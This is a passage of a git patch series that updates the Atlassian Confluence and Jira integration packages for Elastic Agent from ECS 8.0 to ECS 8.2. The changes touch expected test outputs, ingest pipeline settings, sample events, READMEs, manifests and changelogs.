"user": [ @@ -15170,7 +15170,7 @@ }, "@timestamp": "2021-11-23T00:35:03.253Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -15255,7 +15255,7 @@ }, "@timestamp": "2021-11-23T00:35:03.251Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -15340,7 +15340,7 @@ }, "@timestamp": "2021-11-23T00:35:03.250Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -15425,7 +15425,7 @@ }, "@timestamp": "2021-11-23T00:35:03.246Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -15510,7 +15510,7 @@ }, "@timestamp": "2021-11-23T00:35:03.243Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -15595,7 +15595,7 @@ }, "@timestamp": "2021-11-23T00:35:03.241Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -15680,7 +15680,7 @@ }, "@timestamp": "2021-11-23T00:35:03.239Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -15765,7 +15765,7 @@ }, "@timestamp": "2021-11-23T00:35:03.217Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -15838,7 +15838,7 @@ }, "@timestamp": "2021-11-23T00:35:03.201Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -15914,7 +15914,7 @@ }, "@timestamp": "2021-11-23T00:35:03.188Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -16080,7 +16080,7 @@ }, "@timestamp": "2021-11-23T00:35:03.109Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -16146,7 +16146,7 @@ }, "@timestamp": "2021-11-23T00:34:46.735Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -16210,7 +16210,7 @@ }, "@timestamp": "2021-11-23T00:34:45.732Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -16274,7 +16274,7 @@ }, "@timestamp": "2021-11-23T00:34:44.466Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -16348,7 +16348,7 @@ }, "@timestamp": "2021-11-28T17:05:37.142Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -16420,7 +16420,7 @@ }, "@timestamp": "2021-11-28T17:06:11.805Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -16498,7 +16498,7 @@ }, "@timestamp": "2021-11-28T17:05:37.158Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ diff --git a/packages/atlassian_confluence/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json b/packages/atlassian_confluence/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json index 397384df425..37a34c21b8e 100644 --- a/packages/atlassian_confluence/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json +++ b/packages/atlassian_confluence/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json @@ -22,7 +22,7 @@ }, "@timestamp": "2021-11-22T23:42:47.332Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -88,7 +88,7 @@ }, "@timestamp": "2021-11-22T23:42:45.791Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -155,7 +155,7 @@ }, "@timestamp": "2021-11-22T23:42:49.660Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -313,7 +313,7 @@ }, "@timestamp": "2021-11-22T23:43:21.440Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -380,7 +380,7 @@ }, "@timestamp": "2021-11-22T23:43:21.536Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -457,7 +457,7 @@ }, "@timestamp": "2021-11-22T23:43:21.552Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -546,7 +546,7 @@ }, "@timestamp": "2021-11-22T23:43:21.592Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -632,7 +632,7 @@ }, "@timestamp": "2021-11-22T23:43:21.620Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -718,7 +718,7 @@ }, "@timestamp": "2021-11-22T23:43:21.623Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -804,7 +804,7 @@ }, "@timestamp": "2021-11-22T23:43:21.627Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -890,7 +890,7 @@ }, "@timestamp": "2021-11-22T23:43:21.688Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -976,7 +976,7 @@ }, "@timestamp": "2021-11-22T23:43:21.692Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -1062,7 +1062,7 @@ }, "@timestamp": "2021-11-22T23:43:21.694Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -1148,7 +1148,7 @@ }, "@timestamp": "2021-11-22T23:43:21.696Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -1244,7 +1244,7 @@ }, "@timestamp": "2021-11-22T23:43:22.540Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1334,7 +1334,7 @@ }, "@timestamp": "2021-11-22T23:43:22.147Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1423,7 +1423,7 @@ }, "@timestamp": "2021-11-22T23:43:22.172Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1529,7 +1529,7 @@ }, "@timestamp": "2021-11-22T23:43:22.401Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -1625,7 +1625,7 @@ }, "@timestamp": "2021-11-22T23:43:22.429Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -1715,7 +1715,7 @@ }, "@timestamp": "2021-11-22T23:43:22.437Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -1811,7 +1811,7 @@ }, "@timestamp": "2021-11-22T23:43:22.442Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -1907,7 +1907,7 @@ }, "@timestamp": "2021-11-22T23:43:22.445Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -1997,7 +1997,7 @@ }, "@timestamp": "2021-11-22T23:43:22.447Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -2093,7 +2093,7 @@ }, "@timestamp": "2021-11-22T23:43:22.450Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -2189,7 +2189,7 @@ }, "@timestamp": "2021-11-22T23:43:22.454Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -2279,7 +2279,7 @@ }, "@timestamp": "2021-11-22T23:43:22.457Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -2375,7 +2375,7 @@ }, "@timestamp": "2021-11-22T23:43:22.459Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -2471,7 +2471,7 @@ }, "@timestamp": "2021-11-22T23:43:22.462Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -2561,7 +2561,7 @@ }, "@timestamp": "2021-11-22T23:43:22.464Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -2657,7 +2657,7 @@ }, "@timestamp": "2021-11-22T23:43:22.467Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -2753,7 +2753,7 @@ }, "@timestamp": "2021-11-22T23:43:22.470Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -2849,7 +2849,7 @@ }, "@timestamp": "2021-11-22T23:43:22.472Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -2939,7 +2939,7 @@ }, "@timestamp": "2021-11-22T23:43:22.475Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -3035,7 +3035,7 @@ }, "@timestamp": "2021-11-22T23:43:22.479Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -3131,7 +3131,7 @@ }, "@timestamp": "2021-11-22T23:43:22.481Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -3221,7 +3221,7 @@ }, "@timestamp": "2021-11-22T23:43:22.484Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -3317,7 +3317,7 @@ }, "@timestamp": "2021-11-22T23:43:22.486Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -3413,7 +3413,7 @@ }, "@timestamp": "2021-11-22T23:43:22.489Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -3503,7 +3503,7 @@ }, "@timestamp": "2021-11-22T23:43:22.491Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -3599,7 +3599,7 @@ }, "@timestamp": "2021-11-22T23:43:22.493Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -3695,7 +3695,7 @@ }, "@timestamp": "2021-11-22T23:43:22.496Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -3785,7 +3785,7 @@ }, "@timestamp": "2021-11-22T23:43:22.498Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -3881,7 +3881,7 @@ }, "@timestamp": "2021-11-22T23:43:22.501Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -3977,7 +3977,7 @@ }, "@timestamp": "2021-11-22T23:43:22.503Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -4067,7 +4067,7 @@ }, "@timestamp": "2021-11-22T23:43:22.506Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -4163,7 +4163,7 @@ }, "@timestamp": "2021-11-22T23:43:22.508Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -4259,7 +4259,7 @@ }, "@timestamp": "2021-11-22T23:43:22.510Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -4349,7 +4349,7 @@ }, "@timestamp": "2021-11-22T23:43:22.513Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -4445,7 +4445,7 @@ }, "@timestamp": "2021-11-22T23:43:22.515Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -4541,7 +4541,7 @@ }, "@timestamp": "2021-11-22T23:43:22.518Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -4631,7 +4631,7 @@ }, "@timestamp": "2021-11-22T23:43:22.520Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -4727,7 +4727,7 @@ }, "@timestamp": "2021-11-22T23:43:22.522Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -4823,7 +4823,7 @@ }, "@timestamp": "2021-11-22T23:43:22.525Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -4913,7 +4913,7 @@ }, "@timestamp": "2021-11-22T23:43:22.527Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -5009,7 +5009,7 @@ }, "@timestamp": "2021-11-22T23:43:22.529Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -5105,7 +5105,7 @@ }, "@timestamp": "2021-11-22T23:43:22.532Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -5179,7 +5179,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -5247,7 +5247,7 @@ }, "@timestamp": "2021-11-22T23:44:13.873Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -5329,7 +5329,7 @@ }, "@timestamp": "2021-11-22T23:47:20.815Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -5402,7 +5402,7 @@ }, "@timestamp": "2021-11-22T23:49:50.382Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -5497,7 +5497,7 @@ }, "@timestamp": "2021-11-22T23:50:13.842Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5587,7 +5587,7 @@ }, "@timestamp": "2021-11-22T23:50:13.966Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5676,7 +5676,7 @@ }, "@timestamp": "2021-11-22T23:50:32.205Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5774,7 +5774,7 @@ }, "@timestamp": "2021-11-22T23:50:35.770Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ diff --git a/packages/atlassian_confluence/data_stream/audit/elasticsearch/ingest_pipeline/default.yml b/packages/atlassian_confluence/data_stream/audit/elasticsearch/ingest_pipeline/default.yml index 9f11a631a48..2d64b9a828b 100644 --- a/packages/atlassian_confluence/data_stream/audit/elasticsearch/ingest_pipeline/default.yml +++ b/packages/atlassian_confluence/data_stream/audit/elasticsearch/ingest_pipeline/default.yml @@ -6,7 +6,7 @@ processors: value: '{{_ingest.timestamp}}' - set: field: ecs.version - value: '8.0.0' + value: '8.2.0' - rename: field: message target_field: event.original diff --git a/packages/atlassian_confluence/data_stream/audit/sample_event.json b/packages/atlassian_confluence/data_stream/audit/sample_event.json index 1d05591a3e5..9ebea4db129 100644 --- a/packages/atlassian_confluence/data_stream/audit/sample_event.json +++ b/packages/atlassian_confluence/data_stream/audit/sample_event.json @@ -45,7 +45,7 @@ "type": "logs" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "82d0dfd8-3946-4ac0-a092-a9146a71e3f7", diff --git a/packages/atlassian_confluence/docs/README.md b/packages/atlassian_confluence/docs/README.md index 7f66c992099..08a70361423 100644 --- a/packages/atlassian_confluence/docs/README.md +++ b/packages/atlassian_confluence/docs/README.md @@ -146,7 +146,7 @@ An example event for `audit` looks as following: "type": "logs" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "82d0dfd8-3946-4ac0-a092-a9146a71e3f7", diff --git a/packages/atlassian_confluence/manifest.yml b/packages/atlassian_confluence/manifest.yml index d7d9b8cb7b8..721698bdac0 100644 --- a/packages/atlassian_confluence/manifest.yml +++ b/packages/atlassian_confluence/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: atlassian_confluence title: Atlassian Confluence -version: 1.1.0 +version: 1.2.0 license: basic description: Collect logs from Atlassian Confluence with Elastic Agent. type: integration From f8279b830ac040bcbefc320cfbef2e523d8d887f Mon Sep 17 00:00:00 2001 From: Taylor Swanson Date: Tue, 22 Feb 2022 12:27:05 -0600 Subject: [PATCH 05/23] Update atlassian_jira to ECS 8.2 --- packages/atlassian_jira/_dev/build/build.yml | 2 +- packages/atlassian_jira/changelog.yml | 5 + .../pipeline/test-audit-api.log-expected.json | 196 +++++++++--------- .../test-audit-files.log-expected.json | 176 ++++++++-------- .../elasticsearch/ingest_pipeline/default.yml | 2 +- .../data_stream/audit/sample_event.json | 2 +- packages/atlassian_jira/docs/README.md | 2 +- packages/atlassian_jira/manifest.yml | 2 +- 8 files changed, 196 insertions(+), 191 deletions(-) diff --git a/packages/atlassian_jira/_dev/build/build.yml b/packages/atlassian_jira/_dev/build/build.yml index 809e76063e9..d61527283ec 100644 --- a/packages/atlassian_jira/_dev/build/build.yml +++ b/packages/atlassian_jira/_dev/build/build.yml @@ -1,3 +1,3 @@ dependencies: ecs: - reference: git@8.0 + reference: git@8.2 diff --git a/packages/atlassian_jira/changelog.yml b/packages/atlassian_jira/changelog.yml index ce9318cde7a..3857866bdd8 100644 --- a/packages/atlassian_jira/changelog.yml +++ b/packages/atlassian_jira/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.2.0" + changes: + - description: Update to ECS 8.2 + type: enhancement + link: https://github.com/elastic/integrations/pull/xxxx - version: "1.1.0" changes: - description: Update to ECS 8.0 diff --git a/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json b/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json index edf3189694f..a683390cf18 100644 --- a/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json +++ b/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json @@ -3,7 +3,7 @@ { "@timestamp": "2021-11-22T00:34:47.536Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -85,7 +85,7 @@ { "@timestamp": "2021-11-22T00:34:40.008Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -167,7 +167,7 @@ { "@timestamp": "2021-11-22T00:34:23.154Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -237,7 +237,7 @@ { "@timestamp": "2021-11-22T00:32:20.234Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -307,7 +307,7 @@ { "@timestamp": "2021-11-22T00:31:52.991Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -377,7 +377,7 @@ { "@timestamp": "2021-11-22T00:31:37.412Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -447,7 +447,7 @@ { "@timestamp": "2021-11-22T00:31:26.455Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -517,7 +517,7 @@ { "@timestamp": "2021-11-22T00:30:59.449Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -587,7 +587,7 @@ { "@timestamp": "2021-11-22T00:26:03.206Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -657,7 +657,7 @@ { "@timestamp": "2021-11-22T00:12:02.856Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -727,7 +727,7 @@ { "@timestamp": "2021-11-22T00:08:34.545Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -797,7 +797,7 @@ { "@timestamp": "2021-11-22T00:08:34.543Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -872,7 +872,7 @@ { "@timestamp": "2021-11-22T00:08:34.535Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -935,7 +935,7 @@ { "@timestamp": "2021-11-22T00:08:34.521Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1010,7 +1010,7 @@ { "@timestamp": "2021-11-22T00:08:34.506Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1079,7 +1079,7 @@ { "@timestamp": "2021-11-22T00:08:34.297Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1173,7 +1173,7 @@ { "@timestamp": "2021-11-22T00:08:34.266Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1236,7 +1236,7 @@ { "@timestamp": "2021-11-22T00:08:34.249Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1305,7 +1305,7 @@ { "@timestamp": "2021-11-22T00:08:34.243Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1374,7 +1374,7 @@ { "@timestamp": "2021-11-22T00:08:34.241Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1443,7 +1443,7 @@ { "@timestamp": "2021-11-22T00:08:34.239Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1512,7 +1512,7 @@ { "@timestamp": "2021-11-22T00:08:34.236Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1581,7 +1581,7 @@ { "@timestamp": "2021-11-22T00:08:34.235Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1650,7 +1650,7 @@ { "@timestamp": "2021-11-22T00:08:34.233Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1719,7 +1719,7 @@ { "@timestamp": "2021-11-22T00:08:34.231Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1793,7 +1793,7 @@ { "@timestamp": "2021-11-22T00:08:34.229Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1862,7 +1862,7 @@ { "@timestamp": "2021-11-22T00:08:34.227Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1936,7 +1936,7 @@ { "@timestamp": "2021-11-22T00:08:34.225Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2005,7 +2005,7 @@ { "@timestamp": "2021-11-22T00:08:34.223Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2074,7 +2074,7 @@ { "@timestamp": "2021-11-22T00:08:34.221Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2148,7 +2148,7 @@ { "@timestamp": "2021-11-22T00:08:34.219Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2217,7 +2217,7 @@ { "@timestamp": "2021-11-22T00:08:34.217Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2291,7 +2291,7 @@ { "@timestamp": "2021-11-22T00:08:34.215Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2360,7 +2360,7 @@ { "@timestamp": "2021-11-22T00:08:34.212Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2434,7 +2434,7 @@ { "@timestamp": "2021-11-22T00:08:34.210Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2508,7 +2508,7 @@ { "@timestamp": "2021-11-22T00:08:34.208Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2577,7 +2577,7 @@ { "@timestamp": "2021-11-22T00:08:34.204Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2651,7 +2651,7 @@ { "@timestamp": "2021-11-22T00:08:34.190Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2720,7 +2720,7 @@ { "@timestamp": "2021-11-22T00:08:34.187Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2789,7 +2789,7 @@ { "@timestamp": "2021-11-22T00:08:34.184Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2863,7 +2863,7 @@ { "@timestamp": "2021-11-22T00:08:34.182Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2932,7 +2932,7 @@ { "@timestamp": "2021-11-22T00:08:34.180Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3001,7 +3001,7 @@ { "@timestamp": "2021-11-22T00:08:34.178Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3070,7 +3070,7 @@ { "@timestamp": "2021-11-22T00:08:34.176Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3139,7 +3139,7 @@ { "@timestamp": "2021-11-22T00:08:34.174Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3208,7 +3208,7 @@ { "@timestamp": "2021-11-22T00:08:34.173Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3282,7 +3282,7 @@ { "@timestamp": "2021-11-22T00:08:34.171Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3351,7 +3351,7 @@ { "@timestamp": "2021-11-22T00:08:34.168Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3420,7 +3420,7 @@ { "@timestamp": "2021-11-22T00:08:34.166Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3489,7 +3489,7 @@ { "@timestamp": "2021-11-22T00:08:34.165Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3558,7 +3558,7 @@ { "@timestamp": "2021-11-22T00:08:34.163Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3627,7 +3627,7 @@ { "@timestamp": "2021-11-22T00:08:34.151Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3696,7 +3696,7 @@ { "@timestamp": "2021-11-22T00:08:34.142Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3765,7 +3765,7 @@ { "@timestamp": "2021-11-22T00:08:34.072Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3828,7 +3828,7 @@ { "@timestamp": "2021-11-22T00:08:33.887Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3924,7 +3924,7 @@ { "@timestamp": "2021-11-22T00:08:33.746Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3987,7 +3987,7 @@ { "@timestamp": "2021-11-22T00:08:33.732Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4056,7 +4056,7 @@ { "@timestamp": "2021-11-22T00:08:33.710Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4135,7 +4135,7 @@ { "@timestamp": "2021-11-22T00:08:33.537Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4199,7 +4199,7 @@ { "@timestamp": "2021-11-22T00:08:33.536Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4263,7 +4263,7 @@ { "@timestamp": "2021-11-22T00:08:33.535Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4327,7 +4327,7 @@ { "@timestamp": "2021-11-22T00:08:33.534Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4391,7 +4391,7 @@ { "@timestamp": "2021-11-22T00:07:09.088Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4465,7 +4465,7 @@ { "@timestamp": "2021-11-22T00:07:09.037Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4526,7 +4526,7 @@ { "@timestamp": "2021-11-22T00:07:02.794Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4600,7 +4600,7 @@ { "@timestamp": "2021-11-22T00:07:02.725Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4674,7 +4674,7 @@ { "@timestamp": "2021-11-22T00:07:02.694Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4748,7 +4748,7 @@ { "@timestamp": "2021-11-22T00:07:01.669Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4822,7 +4822,7 @@ { "@timestamp": "2021-11-22T00:07:01.644Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4896,7 +4896,7 @@ { "@timestamp": "2021-11-22T00:06:59.522Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4970,7 +4970,7 @@ { "@timestamp": "2021-11-22T00:06:59.485Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5031,7 +5031,7 @@ { "@timestamp": "2021-11-22T00:06:59.340Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5088,7 +5088,7 @@ { "@timestamp": "2021-11-22T00:06:59.332Z", "ecs": 